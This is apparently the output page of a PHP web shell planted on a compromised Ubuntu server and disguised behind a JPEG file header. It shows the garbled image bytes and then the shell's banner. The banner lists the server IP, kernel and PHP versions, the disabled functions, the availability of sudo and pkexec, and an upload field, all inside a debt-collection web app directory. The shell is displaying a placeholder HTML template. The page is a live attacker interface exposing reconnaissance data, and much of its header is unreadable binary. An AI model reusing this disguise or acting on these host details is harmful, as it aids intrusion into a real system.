����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 216.73.216.68 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/muebles/mueblesOLDMAYO/applicationOLD/debtcollector/ |
Upload File : |
<!DOCTYPE HTML> <!-- Phantom by HTML5 UP html5up.net | @ajlkn Free for personal and commercial use under the CCA 3.0 license (html5up.net/license) --> <html> <head> <title>Reporte de Cobranza</title> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" /> <link rel="stylesheet" href="assets/css/main.css" /> <noscript><link rel="stylesheet" href="assets/css/noscript.css" /></noscript> </head> <body class="is-preload"> <!-- Wrapper --> <div id="wrapper"> <!-- Header --> <header id="header"> <div class="inner"> <!-- Logo --> <a href="index.html" class="logo"> <span class="symbol"><img src="images/logo.svg" alt="" /></span><span class="title">Reporte de Cobranza</span> </a> <!-- Nav --> <nav> <ul> <li><a href="#menu">Menu</a></li> </ul> </nav> </div> </header> <!-- Menu --> <nav id="menu"> <h2>Menu</h2> <ul> <li><a href="index.php">Inicio</a></li> </ul> </nav> <!-- Main --> <div id="main"> <div class="inner"> <h1>Detalles</h1> <!-- Table --> <section> <h3>Cobrados</h3> <div class="table-wrapper"> <table class="alt"> <thead> <tr> <th>Name</th> <th>Description</th> <th>Price</th> </tr> </thead> <tbody> <tr> <td>Item One</td> <td>Ante turpis integer aliquet porttitor.</td> <td>29.99</td> </tr> <tr> <td>Item Two</td> <td>Vis ac commodo adipiscing arcu aliquet.</td> <td>19.99</td> </tr> <tr> <td>Item Three</td> <td> Morbi faucibus arcu accumsan lorem.</td> <td>29.99</td> </tr> <tr> <td>Item Four</td> <td>Vitae integer tempus condimentum.</td> <td>19.99</td> </tr> <tr> <td>Item Five</td> <td>Ante turpis integer aliquet porttitor.</td> <td>29.99</td> </tr> </tbody> <tfoot> <tr> <td colspan="2"></td> <td>100.00</td> </tr> </tfoot> </table> </div> </section> <!-- Buttons --> <!-- Image --> <section> <h2>Clientes</h2> <div class="box alt"> <div class="row gtr-uniform"> <a href="#"><div class="col-12"><span class="image fit"><img src="images/pic13.jpg" alt="" /></span>Cliente 1</div></a> <a href="#"><div class="col-4"><span class="image fit"><img src="images/pic01.jpg" alt="" /></span></div> <a href="#"><div class="col-4"><span class="image fit"><img src="images/pic02.jpg" alt="" /></span></div> <a href="#"><div class="col-4"><span class="image fit"><img src="images/pic03.jpg" alt="" /></span></div> <a href="#"><div class="col-4"><span class="image fit"><img src="images/pic03.jpg" alt="" /></span></div> <a href="#"> <div class="col-4"><span class="image fit"><img src="images/pic01.jpg" alt="" /></span></div> <a href="#"> <div class="col-4"><span class="image fit"><img src="images/pic02.jpg" alt="" /></span></div> <a href="#"> <div class="col-4"><span class="image fit"><img src="images/pic02.jpg" alt="" /></span></div> <a href="#"><div class="col-4"><span class="image fit"><img src="images/pic03.jpg" alt="" /></span></div> <a href="#"> <div class="col-4"><span class="image fit"><img src="images/pic01.jpg" alt="" /></span></div> </div> </div> </section> </div> </div> <!-- Footer --> <footer id="footer"> <div class="inner"> <ul class="copyright"> <li>© Untitled. All rights reserved 2022</li><li>Design: <a href="https://yusasoft1.com">Sistemas Yusa</a></li> </ul> </div> </footer> </div> <!-- Scripts --> <script src="assets/js/jquery.min.js"></script> <script src="assets/js/browser.min.js"></script> <script src="assets/js/breakpoints.min.js"></script> <script src="assets/js/util.js"></script> <script src="assets/js/main.js"></script> </body> </html>